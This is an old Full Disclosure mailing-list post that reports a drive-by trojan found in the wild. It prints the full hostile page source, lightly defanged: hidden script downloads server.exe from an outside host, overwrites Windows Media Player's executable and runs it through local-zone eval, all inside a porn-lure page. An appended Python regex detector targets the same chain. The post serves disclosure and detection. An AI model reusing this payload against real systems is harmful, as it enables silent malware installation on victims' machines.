Full Disclosure mailing list archives
interesting trojan in the wild
From: Michael Scheidell <scheidell () secnap net>
Date: Wed, 8 Oct 2003 11:32:46 -0400 (EDT)
This just found in the wild: I replaced the < character with a ^ to make sure the script doesn't inadvertently run on your machine. This replaces your media player with a trojan, and I'm assuming MSIE is vulnerable. Here's the code:

^script language="JavaScript">
^!--
document.cookie='from=noref; expires=Wednesday, 8-Oct-03 23:17:30 GMT;';
//-->
^/script>
^html>
^head>
^script language="Javascript">
^!--
var exit=true;
function exitmoney() {
  if (exit) open("http://www.freemedias.com/pop.html","new_window");
}
//-->
^/script>
^meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
^meta name="GENERATOR" content="Microsoft FrontPage 4.0">
^meta name="ProgId" content="FrontPage.Editor.Document">
^title>FREE PORN GALLERY^/title>
^/head>
^body onUnload="exitmoney()">
^textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.freemedias.com/404/server.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
^/textarea>
^script language="javascript">
function preparecode(code) {
  result = '';
  lines = code.split(/\r\n/);
  for (i=0;i^lines.length;i++) {
    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");
    if (line != '') {
      result += line +'\\r\\n';
    }
  }
  return result;
}
function doit() {
  mycode = preparecode(document.all.code.value);
  myURL = "file:javascript:eval('" + mycode + "')";
  window.open(myURL,"_media");
}
window.open("ieerror.php","_media");
setTimeout("doit()", 3000);
^/script>
^p align="center">
^A href="http://www.vigrx.com/clicks/clickthrough.html?a=sexxxsite&b=172" onclick="exit=false">^IMG src="vigpillhorizontal15.gif" border=0 width="468" height="80">^/A>^br>
^b>EVERY TIME YOU REFRESH THIS PAGE NEW PICTURES WILL SHOW!.^/b>
^p align="center">
^script src="start.php">^/script>
^script src="randpic.php?1">^/script>
^script src="randpic.php?2">^/script>
^script src="randpic.php?3">^/script>
^script src="randpic.php?4">^/script>^br>
^script src="randpic.php?5">^/script>
^script src="randpic.php?6">^/script>
^script src="randpic.php?7">^/script>
^script src="randpic.php?8">^/script>^br>
^script src="randpic.php?9">^/script>
^script src="randpic.php?10">^/script>
^script src="randpic.php?11">^/script>
^script src="randpic.php?12">^/script>^br>
^script src="end.php">^/script>
^/p>
^p align="center">^font face="Arial Narrow" size="4">^b>NO CREDIT CARD - NO BANK ACCOUNT - NO AGE VERIFICATION^/b>^/font>^a href="http://c.fsx.com/c?z=548,81084,8,pffa,pinkforfree.com/" onclick="exit=false">^font face="Arial Narrow" size="4">^b>^br>
^/b>^/font>^img src="http://www.pinkforfree.com/banners/banners/p4f_468-05.jpg" width="468" height="60">^br>
^/a>^b>100% FREE HIGH QUALITY PORN^/b>^/p>
^/body>
^/html>

--
Michael Scheidell
SECNAP Network Security, LLC
Main: 561-368-9561 / www.secnap.net
Looking for a career in Internet security? http://www.secnap.net/employment/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
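The chain in the post (fetch a binary with Microsoft.XMLHTTP, write it to disk with ADODB.Stream.SaveToFile, then run the script from a file:javascript: URL so it executes in the local zone) is easy to flag in captured page content. The following detector is an added example, not part of the original message; the sample HTML is constructed for the test and the URL and path in it are placeholders.

```python
import re

# One regex per stage of the chain the post shows: fetch a binary over
# XMLHTTP, write it with ADODB.Stream, then run script in the local zone.
STAGES = {
    "xmlhttp_fetch": re.compile(r'ActiveXObject\s*\(\s*["\']Microsoft\.XMLHTTP["\']\s*\)', re.I),
    "adodb_stream": re.compile(r'ActiveXObject\s*\(\s*["\']ADODB\.Stream["\']\s*\)', re.I),
    "save_to_file": re.compile(r'\.SaveToFile\s*\(\s*"((?:[^"\\]|\\.)*)"', re.I),
    "local_zone_eval": re.compile(r'file:javascript:', re.I),
    "hidden_code_store": re.compile(r'<textarea[^>]*display\s*:\s*none', re.I),
}

def scan_html(html: str) -> dict:
    """Report which stages are present, the write target (if any) and a verdict."""
    hits = {name: bool(rx.search(html)) for name, rx in STAGES.items()}
    target = None
    m = STAGES["save_to_file"].search(html)
    if m:
        # The path is a JScript string literal: undo the "\\" escaping for the analyst.
        target = m.group(1).replace("\\\\", "\\")
    chain = hits["xmlhttp_fetch"] and hits["adodb_stream"] and hits["save_to_file"]
    if chain and hits["local_zone_eval"]:
        verdict = "download-and-overwrite via local-zone script execution"
    elif chain:
        verdict = "download-and-overwrite (ADODB.Stream)"
    elif any(hits.values()):
        verdict = "suspicious: partial indicators"
    else:
        verdict = "clean"
    return {"stages": hits, "write_target": target, "verdict": verdict}

# Constructed sample (placeholder host and path), just enough to exercise each stage.
SAMPLE = '''<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://example.invalid/payload.exe", 0); x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.SaveToFile("C:\\\\Program Files\\\\Example\\\\app.exe", 2);
</textarea>
<script>window.open("file:javascript:eval('...')", "_media");</script>'''

BENIGN = '<html><body><script>document.title = "hello";</script></body></html>'

if __name__ == "__main__":
    print(scan_html(SAMPLE)["verdict"], "->", scan_html(SAMPLE)["write_target"])
    print(scan_html(BENIGN)["verdict"])
```

Run it over saved page bodies from a proxy or web cache; a hit on the full chain plus a write target under Program Files is worth an alert on its own.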